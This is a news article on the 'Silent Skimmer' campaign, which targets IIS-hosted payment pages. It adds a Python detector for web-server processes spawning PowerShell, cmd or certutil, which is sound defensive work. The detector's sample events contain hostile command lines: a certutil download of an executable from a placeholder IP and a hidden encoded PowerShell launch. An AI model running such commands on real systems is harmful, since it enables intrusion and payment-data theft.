The “Silent Skimmer” is a financially motivated group that has been detected targeting vulnerable online payment infrastructure, such as online businesses and Point of Sale (POS) providers.
The group is most active in the Asia-Pacific (APAC) region. The attacker exploits vulnerabilities in web servers to gain initial access, and the final payload uses payment-scraping techniques to harvest consumers’ sensitive financial information from the compromised websites.
According to findings by the BlackBerry Threat Research and Intelligence team, the threat actor appears to be proficient in Chinese; the group is most active in the APAC region but also has several victims across North America.
Tactics, Techniques, and Procedures (TTPs) Used in This Attack
The campaign operators target web applications, especially those hosted on Internet Information Services (IIS). Their main goal is to compromise the payment checkout page and steal critical payment information from users.
“Once the attacker has obtained initial access to the web server, they deploy various tools and techniques, including open-source tools and Living Off the Land Binaries and Scripts (LOLBAS),” according to the information shared with Cyber Security News.
Researchers say the group uses tools created by GitHub user ihoney, including a port scanner and an implementation of CVE-2019-18935, a vulnerability that was previously exploited by the advanced persistent threat (APT) group HAFNIUM and the suspected Vietnamese crimeware actors XE Group.
Successful exploitation of CVE-2019-18935 can result in remote code execution (RCE).
Specifically, reports list at least five privilege-escalation tools, one remote code execution (RCE) exploit, one remote-access tool, one downloader/stager, and one post-exploitation tool used by this campaign.
The payload then deploys a PowerShell script acting as a remote access tool (RAT), which can carry out a variety of tasks, including gathering system data, searching for, downloading and uploading files of interest, and connecting to a database.
This RAT connects to a server hosting various tools, including a Fast Reverse Proxy (FRP) tool that lets attackers expose local servers from behind a NAT, remote access scripts, downloader scripts, webshells, Cobalt Strike beacons, and exploits.
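As an added detection example (not code from the BlackBerry report or this article), the following Python flags the pattern the TTP section describes from the defender's side: an IIS worker process (w3wp.exe) launching LOLBAS such as PowerShell or cmd.exe, which is the typical footprint of webshell-driven post-exploitation on a compromised web server. The JSON event format, field names and sample events are constructed assumptions, not real telemetry.

```python
import json
import ntpath

# IIS worker process, and the LOLBAS children a healthy web application should not spawn.
WEB_SERVER_PARENTS = {"w3wp.exe"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe",
                       "bitsadmin.exe", "mshta.exe", "rundll32.exe"}

# Constructed process-creation events (Sysmon Event ID 1 style), one JSON object per line.
SAMPLE_EVENTS = r"""
{"ts": "2023-09-20T10:01:02Z", "host": "web01", "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"}
{"ts": "2023-09-20T10:01:05Z", "host": "web01", "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami"}
{"ts": "2023-09-20T10:02:00Z", "host": "web01", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe Get-Date"}
{"ts": "2023-09-20T10:03:00Z", "host": "web01", "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/tool.exe tool.exe"}
"""


def _has_encoded_command(cmdline: str) -> bool:
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    for token in cmdline.lower().split():
        if token.startswith("-e") and "-encodedcommand".startswith(token):
            return True
    return False


def classify_event(event: dict) -> list:
    """Return the reasons an event looks suspicious; an empty list means benign."""
    parent = ntpath.basename(event.get("parent", "")).lower()
    image = ntpath.basename(event.get("image", "")).lower()
    reasons = []
    if parent in WEB_SERVER_PARENTS and image in SUSPICIOUS_CHILDREN:
        reasons.append(f"{parent} spawned {image}")
    if image in {"powershell.exe", "pwsh.exe"} and _has_encoded_command(event.get("cmdline", "")):
        reasons.append("encoded PowerShell command")
    return reasons


def find_suspicious(raw_lines: str) -> list:
    """Scan newline-delimited JSON events and return (timestamp, reasons) for each hit."""
    hits = []
    for line in raw_lines.strip().splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = classify_event(event)
        if reasons:
            hits.append((event["ts"], reasons))
    return hits


if __name__ == "__main__":
    for ts, reasons in find_suspicious(SAMPLE_EVENTS):
        print(ts, "; ".join(reasons))
```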
Final Thoughts
The “Silent Skimmer” campaign aims to find and exploit vulnerable web applications worldwide. The threat actor may be actively seeking new and larger targets on the strength of its recent success.
“Traditionally, some servers have been noted to lack the modern security technologies currently available for traditional endpoints,” researchers said.
“That makes them an attractive target for attackers, especially considering they are easier to maintain persistence on, and bearing in mind the sensitive type of data they process, specifically payment information.”
Researchers expect further attacks against systems like these in the future, both in the same regions and elsewhere.